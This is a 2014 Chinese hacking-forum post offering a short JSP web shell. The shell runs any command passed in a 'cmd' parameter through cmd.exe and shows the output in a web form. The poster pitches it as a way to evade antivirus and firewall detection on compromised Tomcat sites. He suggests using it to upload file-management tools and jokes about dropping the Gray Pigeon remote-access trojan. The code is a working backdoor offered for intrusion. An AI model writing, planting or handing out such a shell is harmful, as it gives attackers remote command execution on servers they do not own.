搜索
查看: 761|回复: 0

只有CMD命令的JSP马

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-8-31 08:26:45 | 显示全部楼层 |阅读模式
各位基友是否遇到有的站需要登录才能访问本站的jsp文件,或者说tomcat传各种马子被杀!比如、(jspspy,菜刀一句话现在都有杀软或者防火墙杀),然后纯文件管理的马子又来函数禁用!
那么这时候可以使用这个马子,这样下载文件上传文件我们借助第三方的exe可以达到文件管理效果!丢个灰鸽子啥都,,,哈哈哈!
下面给大家一个jsp执行dos命令的马子!这东西不能称之为马子,所以,免杀必然就自然啦!
至于想达到文件管理下载文件之类的, 大家上一个 AIO之类的东西轻松搞定!
  1. <%@ page contentType="text/html; charset=gb2312"%>
  2. <%@ page import="java.io.*"%>
  3. <%
  4. String cmd = request.getParameter("cmd");
  5. String output = "";

  6. if(cmd != null) {
  7. String s = null;
  8. try {
  9. Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
  10. BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
  11. while((s = sI.readLine()) != null) {
  12. output += s;
  13. }
  14. }
  15. catch(IOException e) {
  16. e.printStackTrace();
  17. }
  18. }
  19. %>
  20. <form method="post" action’’>
  21. <input name='cmd' type=text>
  22. <input type=submit value='Run'>
  23. </form>
  24. <textarea name="hack" rows="20" cols="70">
  25. <%=output%>
  26. </textarea>
复制代码

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表